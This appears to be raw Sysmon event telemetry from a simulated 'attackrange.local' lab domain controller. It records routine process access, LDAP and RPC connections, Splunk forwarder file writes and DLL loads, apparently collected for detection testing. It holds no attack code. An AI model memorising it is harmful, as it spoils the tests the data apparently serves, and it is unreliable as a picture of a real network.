12:02:13.475{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
11241100x80000000000000004614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT10532021-03-31 12:02:13.475{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask2021-03-31 12:02:13.475 23542300x80000000000000004613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.459{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74BD5E678AE8C7C719C3D8A60BBEDBAD,SHA256=599B8C42CE11C4A4D98BDB81E921949CC76F3B7C9106442EF2694F5C3606C31B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.459{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.459{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.459{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53574-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000004609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.459{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53574-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000004608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.457{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53573-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 
354300x80000000000000004607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.457{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53573-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 10341000x80000000000000004606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.443{266CAFBE-646C-6064-1000-00000000AE01}11242368C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.443{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.443{266CAFBE-64C4-6064-A400-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etlMD5=184FA94EBB57B2609A3F5C014A01CC0D,SHA256=DCB008A7EA59EDDC58DF5FA0C952752415AF5C8017DE4535C9DE1683B1A386D6,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000004603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.334{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.303{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3207325087B5FCCDC86B73C020520D4E,SHA256=2C22B9743F87358DF276462B2C0FF713C15A98622874FD0E8B48C72B9AB297C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.161{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53572-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.161{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53572-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.968{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53571-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.968{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53571-false10.0.1.14win-dc-892.attackrange.local389ldap 10341000x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000004592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63491B1588D81B7F6CA2C093548A28BD,SHA256=9B473AA81050C5EC6737500C762D811A7D7274CCD2E8639A51D4BB8BB5DA4CE6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:13.194{266CAFBE-64C4-6064-A200-00000000AE01}31083356C:\Windows\system32\userinit.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\userinit.exe+1cd8|C:\Windows\system32\userinit.exe+23e5|C:\Windows\system32\userinit.exe+346e|C:\Windows\system32\userinit.exe+3725|C:\Windows\system32\userinit.exe+4553|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.986{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 23542300x80000000000000004589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.179{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FFA4B0C15636092E9C834AA4026664E9,SHA256=B58597776FC71E285816E01AFA37FDCA709FE4260C854FD749C884FE56D83B31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.179{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB3EF7B99C8654EBB2526F8DEE0FC03E,SHA256=5CCFA0FC300F720A4D87618867613C1CA5652AB0F7B569D613CE11116702E35A,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000004587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.163{266CAFBE-64C4-6064-A300-00000000AE01}5052C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000004586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:13.148{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000618) 22542200x80000000000000004697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.188{266CAFBE-64C4-6064-A300-00000000AE01}5052win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x80000000000000004696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.166{266CAFBE-64C3-6064-9800-00000000AE01}4824win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\efsui.exe 10341000x80000000000000004695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.455{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.455{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.455{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.455{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 734700x80000000000000004691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.440{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000004690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.424{266CAFBE-64C6-6064-A800-00000000AE01}25122524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.346{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 